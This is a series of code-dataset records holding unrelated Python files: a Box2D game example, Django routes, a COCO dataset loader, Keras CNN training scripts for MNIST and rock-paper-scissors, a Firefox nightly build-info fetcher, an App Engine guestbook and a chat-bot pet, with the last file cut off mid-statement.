sprite.origin = (self.im0.width//2, self.im0.height//2)\n sprite.position = (x, 300)\n actor = core.Actor(sprite)\n body = world.CreateDynamicBody()\n body.CreateCircleFixture(radius=2.5, density=1.0, friction=0.3)\n actor.add_action(Updater(body), name='box2d')\n layer.add_actor(actor)\n actors = self.layers[0].actors\n actors[1].obstacle = True\n actors[0].add_action(actions.DefferedCall(1.0, self.test_los))\n \n def test_los(self, 
actor):\n max_dist = 800.0/box2d.PPM\n actor2 = self.layers[0].actors[2]\n print(can_see(actor, actor2, max_dist, 45.0))\n self.layers[0].actors[1].obstacle = False\n print(can_see(actor, actor2, max_dist, 45.0))\n\n\ngame = core.Game(800, 600)\nlevel = Level1(b2.world(gravity=(0, 0)))\ngame.run(level)\n", "sub_path": "examples/box2d_los.py", "file_name": "box2d_los.py", "file_ext": "py", "file_size_in_byte": 1584, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pug2d.box2d.PPM", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pug2d.box2d", "line_number": 9, "usage_type": "name"}, {"api_name": "pug2d.box2d.Box2DLevel", "line_number": 11, "usage_type": "name"}, {"api_name": "pug2d.core.Layer", "line_number": 14, "usage_type": "call"}, {"api_name": "pug2d.core", "line_number": 14, "usage_type": "name"}, {"api_name": "Box2D.b2.polygonShape", "line_number": 19, "usage_type": "call"}, {"api_name": "Box2D.b2", "line_number": 19, "usage_type": "name"}, {"api_name": "sf.Texture.load_from_file", "line_number": 22, "usage_type": "call"}, {"api_name": "sf.Texture", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sf.Sprite", "line_number": 24, "usage_type": "call"}, {"api_name": "pug2d.core.Actor", "line_number": 27, "usage_type": "call"}, {"api_name": "pug2d.core", "line_number": 27, "usage_type": "name"}, {"api_name": "pug2d.box2d.Updater", "line_number": 30, "usage_type": "call"}, {"api_name": "pug2d.actions.DefferedCall", "line_number": 34, "usage_type": "call"}, {"api_name": "pug2d.actions", "line_number": 34, "usage_type": "name"}, {"api_name": "pug2d.box2d.PPM", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pug2d.box2d", "line_number": 37, "usage_type": "name"}, {"api_name": "pug2d.box2d.can_see", "line_number": 39, "usage_type": "call"}, {"api_name": "pug2d.box2d.can_see", "line_number": 41, "usage_type": "call"}, {"api_name": "pug2d.core.Game", "line_number": 44, "usage_type": "call"}, {"api_name": "pug2d.core", "line_number": 44, "usage_type": "name"}, {"api_name": "Box2D.b2.world", "line_number": 45, "usage_type": "call"}, {"api_name": "Box2D.b2", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "622824709", "text": "from django.conf.urls import url\nfrom . 
import views\n \nurlpatterns = [\n # ex: /team_server/\n url(r'^$',views.index, name = 'index'),\n # ex: /team_server/test_form\n url(r'^test_form/$', views.test_form, name='test_form'),\n # ex: /team_server/test_form2\n url(r'^test_form2/$', views.test_form2, name='test_form2'),\n # ex: /team_server/video_face_analysis\n url(r'^video_face_analysis/$', views.video_face_analysis, name='video_face_analysis'),\n\n\n\n\n # ex: /team_server/webcam\n url(r'^webcam/$', views.webcam, name='webcam'),\n # ex: /team_server/sending\n url(r'^sending/$', views.sending, name='sending'),\n]\n\n\n\n\n", "sub_path": "mlservice/team_server/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 643, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "245439569", "text": "import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport random\nif __name__ != '__main__':\n from datasets.utils import *\nelse:\n from utils import *\n\n\nclass Dataset(torchvision.datasets.coco.CocoDetection):\n name_table = ['background', \n 'person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',\n 'train', 'truck', 'boat', 'traffic light', 'fire hydrant',\n 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',\n 'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',\n 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',\n 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',\n 'baseball glove', 'skateboard', 'surfboard', 'tennis racket',\n 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',\n 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',\n 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',\n 'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',\n 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',\n 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',\n 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush']\n\n def __init__(self, root_img, file_json, size, normalize, transfer_p, transfer_min):\n super(Dataset, self).__init__(root_img, file_json)\n assert size%2 == 1\n self.root_img = root_img\n self.file_json = file_json\n self.size = size\n self.normalize = normalize\n self.transfer_p = transfer_p\n self.transfer_min = transfer_min\n # other\n self.task = 'bbox'\n self.normalizer = transforms.Normalize((0.485,0.456,0.406), (0.229,0.224,0.225))\n # name_table\n self.index_to_coco = [i for i in range(len(self.name_table))]\n self.coco_to_index = {}\n for cate in self.coco.loadCats(self.coco.getCatIds()):\n name = cate['name']\n if name in self.name_table:\n index = self.name_table.index(name)\n self.index_to_coco[index] = cate['id']\n self.coco_to_index[cate['id']] = index\n # filter self.ids\n ids = []\n for img_id in self.ids:\n img_info = self.coco.loadImgs(img_id)[0]\n height, width = img_info['height'], img_info['width']\n if min(height, width) < 32: continue\n ann_ids = self.coco.getAnnIds(imgIds=img_id, iscrowd=False)\n anno = 
self.coco.loadAnns(ann_ids)\n if len(filter_annotation(anno, self.coco_to_index, height, width))>0:\n ids.append(img_id)\n self.ids = ids\n \n def __len__(self):\n return len(self.ids)\n\n def __getitem__(self, idx):\n '''\n Return:\n img: F(3, size, size)\n location: F(5)\n boxes: F(n, 4)\n labels: L(n)\n '''\n img, anno = super(Dataset, self).__getitem__(idx)\n anno = filter_annotation(anno, self.coco_to_index, img.size[1], img.size[0])\n boxes = [obj['bbox'] for obj in anno]\n boxes = torch.as_tensor(boxes).reshape(-1, 4) # guard against no boxes\n xmin_ymin, w_h = boxes.split([2, 2], dim=1)\n xmax_ymax = xmin_ymin + w_h - 1\n xmin, ymin = xmin_ymin.split([1, 1], dim=1)\n xmax, ymax = xmax_ymax.split([1, 1], dim=1)\n boxes = torch.cat([ymin, xmin, ymax, xmax], dim=1)\n labels = [self.coco_to_index[obj['category_id']] for obj in anno]\n labels = torch.LongTensor(labels)\n # clamp\n boxes[:, :2].clamp_(min=0)\n boxes[:, 2].clamp_(max=float(img.size[1])-1)\n boxes[:, 3].clamp_(max=float(img.size[0])-1)\n # transform\n if random.random() < 0.5: img, boxes, _ = x_flip(img, boxes)\n img, location, boxes, _ = to_square(img, self.size, \n self.transfer_p, self.transfer_min, boxes)\n img = transforms.ToTensor()(img)\n if self.normalize: img = self.normalizer(img)\n return img, location, boxes, labels\n\n def collate_fn(self, data):\n '''\n Return:\n imgs: F(b, 3, size, size)\n locations: F(b, 5)\n boxes: F(b, max_n, 4)\n labels: L(b, max_n) bg:0\n '''\n imgs, locations, boxes, labels = zip(*data)\n imgs = torch.stack(imgs)\n locations = torch.stack(locations)\n batch_num = len(imgs)\n max_n = 0\n for b in range(batch_num):\n if boxes[b].shape[0] > max_n: max_n = boxes[b].shape[0]\n boxes_t = torch.zeros(batch_num, max_n, 4)\n labels_t = torch.zeros(batch_num, max_n).long()\n for b in range(batch_num):\n boxes_t[b, :boxes[b].shape[0]] = boxes[b]\n labels_t[b, :boxes[b].shape[0]] = labels[b]\n return {'imgs':imgs, 'locations':locations, \n 'boxes':boxes_t, 'labels':labels_t}\n\n\nif __name__ == '__main__':\n root_img = 'D:\\\\dataset\\\\microsoft-coco\\\\val2017'\n file_json = 'D:\\\\dataset\\\\microsoft-coco\\\\instances_val2017.json'\n size = 641\n normalize = False\n transfer_p = 1.0\n transfer_min = 0.5\n batch_size = 4\n dataset = Dataset(root_img, file_json, size, normalize, \n transfer_p, transfer_min)\n loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True, \n num_workers=0, collate_fn=dataset.collate_fn)\n for data in loader:\n imgs, locations, boxes, labels = data['imgs'], \\\n data['locations'], data['boxes'], data['labels']\n print('imgs:', imgs.shape)\n print('locations:', locations.shape)\n print('boxes:', boxes.shape)\n print('labels:', labels.shape)\n b = random.randint(0, batch_size-1)\n show_instance(imgs[b], boxes[b], labels[b], name_table=dataset.name_table)\n break\n", "sub_path": "datasets/mscoco_bbox.py", "file_name": "mscoco_bbox.py", "file_ext": "py", "file_size_in_byte": 5996, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torchvision.datasets", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 39, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.as_tensor", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 82, "usage_type": "call"}, 
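The collate_fn in datasets/mscoco_bbox.py above makes variable-length box sets stackable by padding every sample up to the largest box count in the batch, with label 0 (background) marking the padding. The same trick in isolation:

import torch

# Two samples with different box counts, as collate_fn receives them.
boxes_list = [torch.ones(3, 4), 2 * torch.ones(1, 4)]
labels_list = [torch.tensor([1, 2, 3]), torch.tensor([7])]

max_n = max(b.shape[0] for b in boxes_list)           # 3
boxes = torch.zeros(len(boxes_list), max_n, 4)
labels = torch.zeros(len(boxes_list), max_n).long()   # 0 == background padding
for i, (b, l) in enumerate(zip(boxes_list, labels_list)):
    boxes[i, :b.shape[0]] = b
    labels[i, :l.shape[0]] = l

print(boxes.shape, labels.shape)  # torch.Size([2, 3, 4]) torch.Size([2, 3])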
{"api_name": "random.random", "line_number": 88, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 111, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "615757772", "text": "#\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\n#\nimport utility as u\nimport constant as c\n\n\n# # # Data preprocessing\n# load the data\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# show examples\nu.example_show(x_train[:9, :, :], y_train[:9])\n\n# reshape\nx_train = x_train.reshape(c.num_train_imgs, c.img_size, c.img_size, 1)\nx_test = x_test.reshape(c.num_test_imgs, c.img_size, c.img_size, 1)\n\n# normalize the images\nX_train = u.normalize_images(x_train)\nX_test = u.normalize_images(x_test)\n\n# one-hot formate for the target matrices\nY_train = np_utils.to_categorical(y_train, c.num_classes)\nY_test = np_utils.to_categorical(y_test, c.num_classes)\n\n# # # Build the neural network with Keras API\n# structure of the neural network\nmodel = Sequential()\n\nmodel.add(Convolution2D(nb_filter=c.num_filters,\n nb_row=c.kernel_size[0],\n nb_col=c.kernel_size[1],\n border_mode='valid',\n input_shape=c.shape_input))\nmodel.add(Activation('relu'))\nmodel.add(Convolution2D(nb_filter=c.num_filters,\n nb_row=c.kernel_size[0],\n nb_col=c.kernel_size[1]))\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=c.pool_size))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(c.num_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=[\"accuracy\"])\n\n# # # Train the model!\nmodel.fit(X_train, Y_train,\n batch_size=c.batch_size,\n nb_epoch=c.num_episode,\n show_accuracy=True,\n verbose=1,\n validation_data=(X_test, Y_test))\n\n# # # Evaluate its performance\nscore = model.evaluate(X_test, Y_test,\n show_accuracy=True,\n verbose=0)\n\n\nprint('Test Score:{0}'.format(score[0]))\nprint('Test Accuracy:{0}'.format(score[1]))", "sub_path": "Examples/MNIST_CNN/keras_run.py", "file_name": "keras_run.py", "file_ext": "py", "file_size_in_byte": 2168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 14, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 14, "usage_type": "name"}, {"api_name": "utility.example_show", "line_number": 17, "usage_type": "call"}, {"api_name": "constant.num_train_imgs", "line_number": 20, "usage_type": "attribute"}, {"api_name": "constant.img_size", "line_number": 20, "usage_type": "attribute"}, {"api_name": "constant.num_test_imgs", "line_number": 21, "usage_type": "attribute"}, {"api_name": "constant.img_size", "line_number": 21, "usage_type": "attribute"}, {"api_name": "utility.normalize_images", "line_number": 24, "usage_type": "call"}, 
{"api_name": "utility.normalize_images", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 28, "usage_type": "name"}, {"api_name": "constant.num_classes", "line_number": 28, "usage_type": "attribute"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 29, "usage_type": "name"}, {"api_name": "constant.num_classes", "line_number": 29, "usage_type": "attribute"}, {"api_name": "keras.models.Sequential", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 35, "usage_type": "call"}, {"api_name": "constant.num_filters", "line_number": 35, "usage_type": "attribute"}, {"api_name": "constant.kernel_size", "line_number": 36, "usage_type": "attribute"}, {"api_name": "constant.kernel_size", "line_number": 37, "usage_type": "attribute"}, {"api_name": "constant.shape_input", "line_number": 39, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Activation", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 41, "usage_type": "call"}, {"api_name": "constant.num_filters", "line_number": 41, "usage_type": "attribute"}, {"api_name": "constant.kernel_size", "line_number": 42, "usage_type": "attribute"}, {"api_name": "constant.kernel_size", "line_number": 43, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Activation", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 46, "usage_type": "call"}, {"api_name": "constant.pool_size", "line_number": 46, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Dropout", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.core.Flatten", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.layers.core.Dropout", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 53, "usage_type": "call"}, {"api_name": "constant.num_classes", "line_number": 53, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Activation", "line_number": 54, "usage_type": "call"}, {"api_name": "constant.batch_size", "line_number": 60, "usage_type": "attribute"}, {"api_name": "constant.num_episode", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "551835259", "text": "from requests.adapters import HTTPAdapter\nfrom requests_futures.sessions import FuturesSession\nfrom pprint import pprint\nimport re\n\nclass FXRevision(object):\n\n ARCHIVES_URL = 'http://archive.mozilla.org'\n NIGHTLY_URL = ARCHIVES_URL + '/pub/firefox/nightly/'\n TIMEOUT = 5\n MAX_RETRIES = 5\n\n def __init__(self, versions, fx_version, os):\n self.results = [ ]\n self.dates = { }\n self.fx_version = fx_version\n self.os = os\n self.info = { }\n pattern = re.compile('([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})')\n for version in versions:\n m = pattern.search(version)\n self.dates[version] = [m.group(i) for i in range(1, 7)]\n\n self.session = FuturesSession()\n self.session.mount(self.ARCHIVES_URL, HTTPAdapter(max_retries = self.MAX_RETRIES))\n self.__get_info()\n\n def get(self):\n for r in self.results:\n r.result()\n return self.info\n \n def __make_url(self, 
l):\n return self.NIGHTLY_URL + l[0] + '/' + l[1] + '/' + '-'.join(l) + '-mozilla-central/firefox-' + self.fx_version + '.en-US.' + self.os + '.json'\n\n def __info_cb(self, sess, res):\n json = res.json()\n self.info[json['buildid']] = json['moz_source_stamp']\n \n def __get_info(self):\n for date in self.dates.values():\n self.results.append(self.session.get(self.__make_url(date),\n timeout = self.TIMEOUT,\n background_callback = self.__info_cb))\n\n#fxr = FXRevision(['20160223030304'], '47.0a1', 'linux-i686')\n#pprint(fxr.get())\n \n# 2016/02/2016-02-23-03-03-04-mozilla-central/firefox-47.0a1.en-US.linux-i686.txt'\n", "sub_path": "FXRevision.py", "file_name": "FXRevision.py", "file_ext": "py", "file_size_in_byte": 1781, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 19, "usage_type": "call"}, {"api_name": "requests_futures.sessions.FuturesSession", "line_number": 24, "usage_type": "call"}, {"api_name": "requests.adapters.HTTPAdapter", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "555328250", "text": "# -*- coding: utf8 -*- #\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom tools.baserequest import BaseRequestHandler\nfrom tools.paging import Paging\nfrom tools.database import GbDB\n\nfrom google.appengine.ext.webapp.util import login_required\n\nclass GuestBook(BaseRequestHandler):\n def get(self):\n user = users.get_current_user()\n if user:\n form = True\n else:\n form = False\n\n if self.request.GET:\n show = self.request.get('show')\n if show == '':\n show = 0\n else:\n show = Paging().Test_page(show)\n else:\n show = 0\n show = int(show)\n\n greetings_query = GbDB.all().order('-date')\n paging = Paging().page(greetings_query, show)\n greetings = greetings_query.fetch(10, show)\n\n template_values = {\n 'paging':paging,\n 'greetings': greetings,\n 'form': form,\n }\n\n self.generate('guestbook.html', template_values, razdel = 'guestbook', logo = 'logo', title = 'Гостевая');\n\nclass GuestOtvet(BaseRequestHandler):\n @login_required\n def get(self):\n user = users.get_current_user()\n if user:\n if self.request.get('postid'):\n post = GbDB.get_by_id(int(self.request.get('postid')))\n if post:\n template_values = {\n 'greeting': post,\n }\n self.generate('guestbook.otvet.html', template_values, razdel = '', logo = 'logo', title = 'Гостевая');\n else:\n self.redirect(\"/guestbook\")\n else:\n self.redirect(\"/guestbook\")\n else:\n self.redirect(\"/guestbook\")\n\nclass GuestCit(BaseRequestHandler):\n @login_required\n def get(self):\n user = users.get_current_user()\n if user:\n if self.request.get('postid'):\n post = GbDB.get_by_id(int(self.request.get('postid')))\n if post:\n template_values = {\n 'greeting': post,\n }\n self.generate('guestbook.cit.html', template_values, razdel = '', logo = 'logo', title = 'Гостевая');\n else:\n self.redirect(\"/guestbook\")\n else:\n self.redirect(\"/guestbook\")\n else:\n self.redirect(\"/guestbook\")\n\n\nclass GuestPost(webapp.RequestHandler):\n def post(self):\n user = users.get_current_user()\n if user:\n greeting = GbDB()\n greeting.author = user.nickname()\n if self.request.get('content'):\n content = self.request.get('content')\n greeting.content = content\n numchars = content.__len__()\n if numchars > 0 and numchars <= 1000:\n greeting.put()\n self.redirect('/guestbook')\n else:\n self.redirect(\"/guestbook\")\n\nclass GBAdmin(webapp.RequestHandler):\n @login_required\n def 
get(self):\n if users.is_current_user_admin():\n if self.request.GET:\n greetings = GbDB()\n if self.request.get('delgb'):\n greetings = GbDB.get_by_id(int(self.request.get('delgb')))\n greetings.delete()\n self.redirect(\"/guestbook\")", "sub_path": "guestbook.py", "file_name": "guestbook.py", "file_ext": "py", "file_size_in_byte": 3479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tools.baserequest.BaseRequestHandler", "line_number": 10, "usage_type": "name"}, {"api_name": "google.appengine.api.users.get_current_user", "line_number": 12, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 12, "usage_type": "name"}, {"api_name": "tools.paging.Paging", "line_number": 23, "usage_type": "call"}, {"api_name": "tools.database.GbDB.all", "line_number": 28, "usage_type": "call"}, {"api_name": "tools.database.GbDB", "line_number": 28, "usage_type": "name"}, {"api_name": "tools.paging.Paging", "line_number": 29, "usage_type": "call"}, {"api_name": "tools.baserequest.BaseRequestHandler", "line_number": 40, "usage_type": "name"}, {"api_name": "google.appengine.api.users.get_current_user", "line_number": 43, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 43, "usage_type": "name"}, {"api_name": "tools.database.GbDB.get_by_id", "line_number": 46, "usage_type": "call"}, {"api_name": "tools.database.GbDB", "line_number": 46, "usage_type": "name"}, {"api_name": "google.appengine.ext.webapp.util.login_required", "line_number": 41, "usage_type": "name"}, {"api_name": "tools.baserequest.BaseRequestHandler", "line_number": 59, "usage_type": "name"}, {"api_name": "google.appengine.api.users.get_current_user", "line_number": 62, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 62, "usage_type": "name"}, {"api_name": "tools.database.GbDB.get_by_id", "line_number": 65, "usage_type": "call"}, {"api_name": "tools.database.GbDB", "line_number": 65, "usage_type": "name"}, {"api_name": "google.appengine.ext.webapp.util.login_required", "line_number": 60, "usage_type": "name"}, {"api_name": "google.appengine.ext.webapp.RequestHandler", "line_number": 79, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.webapp", "line_number": 79, "usage_type": "name"}, {"api_name": "google.appengine.api.users.get_current_user", "line_number": 81, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 81, "usage_type": "name"}, {"api_name": "tools.database.GbDB", "line_number": 83, "usage_type": "call"}, {"api_name": "google.appengine.ext.webapp.RequestHandler", "line_number": 95, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.webapp", "line_number": 95, "usage_type": "name"}, {"api_name": "google.appengine.api.users.is_current_user_admin", "line_number": 98, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 98, "usage_type": "name"}, {"api_name": "tools.database.GbDB", "line_number": 100, "usage_type": "call"}, {"api_name": "tools.database.GbDB.get_by_id", "line_number": 102, "usage_type": "call"}, {"api_name": "tools.database.GbDB", "line_number": 102, "usage_type": "name"}, {"api_name": "google.appengine.ext.webapp.util.login_required", "line_number": 96, "usage_type": "name"}]} +{"seq_id": "550776622", "text": "import datetime\nimport shelve\nimport utils\n\nutils.check_path(\"data\")\n\ntick = datetime.timedelta(minutes=40)\n\nmaxFood = 30\nmaxHappy = 30\n\nfoodGain = 
6\nhappyGain = 6\n\ndbname = 'data/pets'\n\nclass Pet:\n\tdef __init__(self):\n\t\tself.food = 0\n\t\tself.happy = 0\n\t\tself.lastCheck = datetime.datetime.now()\n\n\tdef feed(self):\n\t\tself.update()\n\t\tif (self.food < maxFood):\n\t\t\tself.food = min(maxFood, self.food + foodGain)\n\t\t\treturn 'You offer the wizard\\'s familiar a treat from your pocket. She takes it and retreats to her perch.' + self.render()\n\t\treturn 'You offer the wizard\\'s familiar a treat from your pocket, but she seems full.' + self.render()\n\n\tdef pet(self):\n\t\tself.update()\n\t\tfactor = self.food/maxFood\n\t\tmessage = ''\n\t\tif factor < 0.3:\n\t\t\tmessage = 'You try to pet the wizard\\'s familiar. She tries to bite your hand. Perhaps she\\'s hungry?'\n\t\telif factor < 0.75:\n\t\t\tmessage = 'You scratch the wizard\\'s familiar under the chin. She chitters contentedly.'\n\t\telse:\n\t\t\tmessage = 'The wizard\\'s familiar rubs against you, trilling happily.'\n\t\tself.happy = min(maxHappy, int(self.happy + (happyGain * factor)))\n\t\treturn message + '\\n' + self.render()\n\n\tdef render(self):\n\t\treturn '```\\nFamiliar:\\n Fed:\\n' + utils.drawGauge(self.food, maxFood) + '\\n Happiness:\\n' + utils.drawGauge(self.happy, maxHappy) + '\\n```'\n\n\tdef update(self):\n\t\ttemp = self.lastCheck + tick\n\t\tif temp < datetime.datetime.now():\n\t\t\tself.lastCheck = datetime.datetime.now()\n\t\twhile temp < datetime.datetime.now():\n\t\t\ttemp += tick\n\t\t\tself.food = max(0, self.food - 1)\n\t\t\tself.happy = max(0, self.happy - 1)\n\nwith shelve.open(dbname) as db:\n\tif 'mainPet' in db:\n\t\tmyPet = db['mainPet']\n\telse:\n\t\tmyPet = Pet()\n\ndef feed():\n\tmessage = myPet.feed()\n\twith shelve.open(dbname) as db:\n\t\tdb['mainPet'] = myPet\n\treturn message\n\ndef pet():\n\tmessage = myPet.pet()\n\twith shelve.open(dbname) as db:\n\t\tdb['mainPet'] = myPet\n\treturn message", "sub_path": "pet.py", "file_name": "pet.py", "file_ext": "py", "file_size_in_byte": 1891, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.check_path", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "utils.drawGauge", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}, {"api_name": "shelve.open", "line_number": 55, "usage_type": "call"}, {"api_name": "shelve.open", "line_number": 63, "usage_type": "call"}, {"api_name": "shelve.open", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "256279851", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 9 09:07:51 2020\n\n@author: jenny\n\"\"\"\n\nimport os\nimport zipfile\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom 
tensorflow.keras.optimizers import RMSprop\nimport matplotlib.pyplot as plt\n\n# # extract zip file\n# # # dataset found here: http://www.laurencemoroney.com/rock-paper-scissors-dataset/\n# zip_file = \"rps.zip\"\n# zip_ref = zipfile.ZipFile(zip_file, 'r')\n# zip_ref.extractall()\n# zip_ref.close()\n\n# zip_file = \"rps-test-set.zip\"\n# zip_ref = zipfile.ZipFile(zip_file, 'r')\n# zip_ref.extractall()\n# zip_ref.close()\n\n# use CNN with rock/paper/sissor dataset\ntrain_dir = \"rps/\"\n\n# ImageDataGenerator is a image generator that generates new augmented images from original\n# images at RUNTIME.\n# First, create an image generator object and specify how to generate image:\n# Ex: rotate, whitening, shear, shift, flip, rescale, ...\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n featurewise_center=True,\n rotation_range=30,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n horizontal_flip=True,\n fill_mode='nearest'\n )\n\n# Then, load the original image from directory and subdirectories:\n# SHOULD point to directory that has subdirectories that has all the labelled data.\n# Name of subdirectory should be the label name so that ImageDataGenerator can automatically\n# generate image+label dataset:\n# EX:\n# DIR---TRAIN----Label1----image1.jpg, image2.jpg, ...\n# | |----Label2----ImgA.jpg, ImgB.jpg, ...\n# |----TEST-----Label1----red.jpg, yel.jpg, ...\n# |----Label2----A.jpg, B.jpg, ...\n#\n# flow_from_directory(DIR, ...) to load image from OS\n# flow(X, Y, ...) to load image in IDE\ntrain_generator = train_datagen.flow_from_directory(\n train_dir, # Points to the dir that has the labelled subdirectories\n target_size=(150,150), # Original image size is (300, 300), resized to (150, 150)\n # at runtime when loaded and not affecting the original image\n class_mode='categorical' # others: \"binary\"\n# batch_size=128 # images are loaded in batches during training and testing,\n# # which is more efficient than loading image one by one\n)\n\ntest_dir = \"rps-test-set/\"\n# Test data just need to normalized/rescale to fit with model\ntest_datagen = ImageDataGenerator(rescale=1./255)\ntest_generator = test_datagen.flow_from_directory(\n test_dir,\n target_size=(150,150),\n class_mode='categorical'\n)\n\nmodel = Sequential([\n Conv2D(64, (3,3), activation='relu', input_shape=(150,150,3)),\n MaxPooling2D(pool_size=(2,2)),\n Conv2D(64, (3,3), activation='relu'),\n MaxPooling2D(pool_size=(2,2)),\n Conv2D(128, (3,3), activation='relu'),\n MaxPooling2D(pool_size=(2,2)),\n Conv2D(128, (3,3), activation='relu'),\n MaxPooling2D(pool_size=(2,2)),\n Flatten(),\n Dropout(0.5),\n Dense(512, activation='relu'),\n Dense(3, activation='softmax')\n])\nmodel.compile(loss='categorical_crossentropy',\n optimizer=RMSprop(lr=0.01),\n 